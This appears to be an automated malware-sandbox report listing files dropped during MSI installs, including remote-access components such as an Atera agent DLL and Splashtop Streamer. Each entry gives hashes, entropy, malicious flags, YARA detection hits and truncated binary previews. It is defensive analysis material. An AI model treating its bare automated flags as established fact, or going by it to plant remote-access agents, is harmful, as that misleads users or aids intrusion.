                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x.....V...V...V:i.W...V:i.WR..V.q.W...V.q.W...V.q.W...V:i.W...V:i.W...V:i.W...V...V&..Vup.W...Vup.W...VupFV...V...V...Vup.W...VRich...V................PE..L......e...........!.....<...X......Q........P...........................................@..........................G.......L..........x............|..pW...........<..T............................<..@............P..0............................text....:.......<.................. ..`.rdata.......P.......@..............@..@.data...4$...`.......N..............@....rsrc...x............X..............@..@.reloc...............^..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSI6892.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4254
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.7220076108176
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:JLmgjdqJLaU3gtEVPQHLxglmt3tFbSuce6ItDDkrQEPbdBZ:V3qEUweUesJLSuce6pkWbF
                                                                                                                                                                                                                                                                                                                                  MD5:E6E28ADC5F7DD3BC97C59097CBDC7889
                                                                                                                                                                                                                                                                                                                                  SHA1:220C66CED5904CB88F866C86C320F806ADD98425
                                                                                                                                                                                                                                                                                                                                  SHA-256:992F950BBF01C5F301B4A7290B1447C8A3F684B0EED199638E927F7597C5FACE
                                                                                                                                                                                                                                                                                                                                  SHA-512:70EE5BE4D86E3AA5E898160144018EB545A2E46677F077D4B678A9AAB59C6160F3DEC217AC02F264B6EC1D7E1786E4DFB3493A4DC4C35B96F86D8195BE58AD41
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@..^Y.@.....@.....@.....@.....@.....@......&.{C59601A1-771B-426B-A9F7-6CACCAC4DB4E}".Microsoft .NET Host - 6.0.35 (x64)..dotnet-host-6.0.35-win-x64.msi.@.....@.S.0.@.....@........&.{C44636B0-CF91-423F-8EBB-E5C6C9CC18A4}.....@.....@.....@.....@.......@.....@.....@.......@....".Microsoft .NET Host - 6.0.35 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{3AB1371A-161F-5BD9-98C8-F9BF7A103CA5}X.02:\Software\Classes\Installer\Dependencies\Dotnet_CLI_SharedHost_48.3.31210_x64\Version.@.......@.....@.....@......&.{45399BBB-DDA5-4386-A2E9-618FB3C54A18}".C:\Program Files\dotnet\dotnet.exe.@.......@.....@.....@......&.{EA9C3F98-F9B1-5212-8980-CFEAF2B15E0D}B.22:\SOFTWARE\dotnet\Setup\InstalledVersions\x64\sharedhost\Version.@.......@.....@.....@......&.{E4E008C8-57A8-5040-BB34-03024B15B6C5}?.02:\SOFTWARE\dotnet\Setup\InstalledVersions\x64\

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSI6B72.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                                  Size (bytes):250736
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.765155684437659
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:hXiqyhTO8W0iEa8LW0bEC9hvZpC01v+eUKflQnZl+T+J7g6EsNr7wyy/EPzr9XA:hqhy8VKU3hvZUy+ppHEsuB/cBQ
                                                                                                                                                                                                                                                                                                                                  MD5:60E8C139E673B9EB49DC83718278BC88
                                                                                                                                                                                                                                                                                                                                  SHA1:00A3A9CD6D3A9F52628EA09C2E645FE56EE7CD56
                                                                                                                                                                                                                                                                                                                                  SHA-256:B181B6B4D69A53143A97A306919BA1ADBC0B036A48B6D1D41AE7A01E8EF286CB
                                                                                                                                                                                                                                                                                                                                  SHA-512:AC7CB86DBF3B86F00DA7B8A246A6C7EF65A6F1C8705EA07F9B90E494B6239FB9626B55EE872A9B7F16575A60C82E767AF228B8F018D4D7B9F783EFACCCA2B103
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x.....V...V...V:i.W...V:i.WR..V.q.W...V.q.W...V.q.W...V:i.W...V:i.W...V:i.W...V...V&..Vup.W...Vup.W...VupFV...V...V...Vup.W...VRich...V................PE..L......e...........!.....<...X......Q........P...........................................@..........................G.......L..........x............|..pW...........<..T............................<..@............P..0............................text....:.......<.................. ..`.rdata.......P.......@..............@..@.data...4$...`.......N..............@....rsrc...x............X..............@..@.reloc...............^..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSI9F94.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):182768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.29474871459677
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:M3hCcV2YVWR8xSSIqeCjEIz+hZvgvE5Q+yq8MPdJ0xH:ErTz9Pj/Ag/+XPw
                                                                                                                                                                                                                                                                                                                                  MD5:9ED1749276D20BE78D5E7A30D658C484
                                                                                                                                                                                                                                                                                                                                  SHA1:EAAEA2656A63366A888955CE030E091FEA70F0F6
                                                                                                                                                                                                                                                                                                                                  SHA-256:61F398C652504FEE07AF12AC50D4A70ECFF641234A4EDA59C68EC937B6D80C96
                                                                                                                                                                                                                                                                                                                                  SHA-512:33ACF0BDBD1F33526D348A47BC00963843FC72EB203DF07D0136110109C892FB20AA9D3147204F958B95D750F7F98EB5DF3C387ED4B8802B7F929F201B41E90F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x......................K.......................n...............nz.....K.......K.......K.........T.....K.......Rich....................PE..L....7.d...........!.................................................................I....@..........................E..a....6..........p................-......t...................................h...@............................................text............................... ..`.rdata..............................@..@.data...41...P.......:..............@....rsrc...p............L..............@..@.reloc...H.......J...R..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSI9FF2.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):171064
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.093983981233022
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:jq44uv69SIrScxe0IZNJ+x+uk+hZPDFNkXAO4VR:jfn2Slcxe0Fc9CcQO2
                                                                                                                                                                                                                                                                                                                                  MD5:E80F90724939D4F85FC49DE2460B94B5
                                                                                                                                                                                                                                                                                                                                  SHA1:512EA4DEBA1C97CC7EC394BCE0E4A32CD497176E
                                                                                                                                                                                                                                                                                                                                  SHA-256:8041D3CCBAFA491D35F70030C3AFEBA683B0235BED24F242878D04C7E87B8687
                                                                                                                                                                                                                                                                                                                                  SHA-512:9494F1CD058DC3923E4F562D8ED2EDF3D252F519EFC6DB4F1B5289D8A1B841A6CB927E14D33DAB98E0BD4D22A5A473B8CD9424F77213527FBE0C183126356767
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._`,"..Bq..Bq..Bq..q..Bq<.q..Bq..q..Bq..q/.Bq..qh.Bq.y.q..Bq.y.q..Bq..Cq..Bq..q..Bq..q..Bq..q..Bq...q..Bq..q..BqRich..Bq........PE..L...`.a...........!.....p...$.....................................................P...................................m............`..p............x..8$...p.. .......................................@............................................text....o.......p.................. ..`.rdata..M............t..............@..@.data....1... ......................@....rsrc...p....`.......$..............@..@.reloc...L...p...N...*..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIA0BF.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4718641
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.577367326443097
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:k3H5BNwueVRfshljU+cCD+EA2IvtynSyeGPCXtoa3yRHbXLjtQ:k3H5BNMshFUi+sng/oaO7y
                                                                                                                                                                                                                                                                                                                                  MD5:25A0AA722268B17888B4E159A9F82F18
                                                                                                                                                                                                                                                                                                                                  SHA1:68CCB5ADAE9095056A9D5592F6A850F30715A86B
                                                                                                                                                                                                                                                                                                                                  SHA-256:72896D8ABEEEB40360596927C0FEADE8F0BC28F9937D35F646B9BA2A47F1EDCA
                                                                                                                                                                                                                                                                                                                                  SHA-512:79A574F95DBB5FF11E35F2938FCD6A9E22A3F1A35D7E032ACEB099DD69AD45DCDF006D92AEB7D1086E3D0615241F6669E510D5DEE6F7D262E0E3D4179822365D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........h.[...[...[....;..R....:..C....;..Z....:.......:..........\.......Z......^.......L...[........;..#....;..Z....;..Z...[...Z....;..Z...Rich[...........PE..L....;.d...........!.....l...........[....................................................@.............................g;...a.......p.......................P...7......8............................ ..@...............H...H\.......................text...2f.......h.................. ..`.orpc... ............l.............. ..`.rdata..w3.......4...p..............@..@.data...............................@....rsrc........p......................@..@.reloc..f(...P...*...r..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIB5CE.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4718641
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.577367326443097
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:k3H5BNwueVRfshljU+cCD+EA2IvtynSyeGPCXtoa3yRHbXLjtQ:k3H5BNMshFUi+sng/oaO7y
                                                                                                                                                                                                                                                                                                                                  MD5:25A0AA722268B17888B4E159A9F82F18
                                                                                                                                                                                                                                                                                                                                  SHA1:68CCB5ADAE9095056A9D5592F6A850F30715A86B
                                                                                                                                                                                                                                                                                                                                  SHA-256:72896D8ABEEEB40360596927C0FEADE8F0BC28F9937D35F646B9BA2A47F1EDCA
                                                                                                                                                                                                                                                                                                                                  SHA-512:79A574F95DBB5FF11E35F2938FCD6A9E22A3F1A35D7E032ACEB099DD69AD45DCDF006D92AEB7D1086E3D0615241F6669E510D5DEE6F7D262E0E3D4179822365D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........h.[...[...[....;..R....:..C....;..Z....:.......:..........\.......Z......^.......L...[........;..#....;..Z....;..Z...[...Z....;..Z...Rich[...........PE..L....;.d...........!.....l...........[....................................................@.............................g;...a.......p.......................P...7......8............................ ..@...............H...H\.......................text...2f.......h.................. ..`.orpc... ............l.............. ..`.rdata..w3.......4...p..............@..@.data...............................@....rsrc........p......................@..@.reloc..f(...P...*...r..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIBA15.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):563561
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.78435931628703
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:gwri7f8m8end5Xy+1kvI8k9W91iVXuXskIhR:gLh8edk+1kv5K+WhR
                                                                                                                                                                                                                                                                                                                                  MD5:448874D53345163862B7375682F6C110
                                                                                                                                                                                                                                                                                                                                  SHA1:D3F3BDE921FEB88A426D8504385F5959F072EB02
                                                                                                                                                                                                                                                                                                                                  SHA-256:4C29D7D9879B7F115CCFC14C2FE254E7149B58F4C0F7E07EC84DF71DFF21742A
                                                                                                                                                                                                                                                                                                                                  SHA-512:2FC48B3E6D03F4BA12FE78317BCB3F85720FC0B4A280390741F10E6F2569515D8D0002E310F32431BA9CB12548AB8F12B170BB02CC2B9984639A9A67AED8E180
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@..^Y.@.....@.....@.....@.....@.....@......&.{B7C5EA94-B96A-41F5-BE95-25D78B486678}..Splashtop Streamer..setup.msi.@.....@.....@.....@......ARPPRODUCTICON.exe..&.{1FFB34B4-02B4-4EEE-ACA4-24941A8EDEE5}.....@.....@.....@.....@.......@.....@.....@.......@......Splashtop Streamer......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{3D8827C3-3F73-4AD7-9420-7CA93653C8F2}2.C:\Program Files (x86)\Splashtop\Splashtop Remote\.@.......@.....@.....@......&.{61B538AB-B209-C01B-F95C-B0A0531054D2}M.C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Acknowledgements.htm.@.......@.....@.....@......&.{3742F778-8BAC-9729-A5BE-712DA9BEB95A}@.C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\.@.......@.....@.....@......&.{ADBB7064-411F-E593-D901-EACB3BA8154E}Z.C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\install_dr

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIC672.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):521954
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                                                                  MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                                                                                  SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                                                                  SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                                                                                  SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIC672.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25600
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                                                                                  MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                                                                                  SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                                                                                  SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                                                                                  SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIC672.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIC672.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIC672.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIC672.tmp-\CustomAction.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1538
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                                                                                  MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                                                                                  SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                                                                                  SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                                                                                  SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIC672.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):184240
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                                                                                  MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                                                                                  SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                                                                                  SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                                                                                  SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIC672.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):711952
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                                                                                  MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                                                                                  SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                                                                                  SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                                                                                  SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIC672.tmp-\System.Management.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):61448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                                                                                  MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                                                                                  SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                                                                                  SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                                                                                  SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIC961.tmp

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):521954
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                                                                  MD5:88D29734F37BDCFFD202EAFCDD082F9D
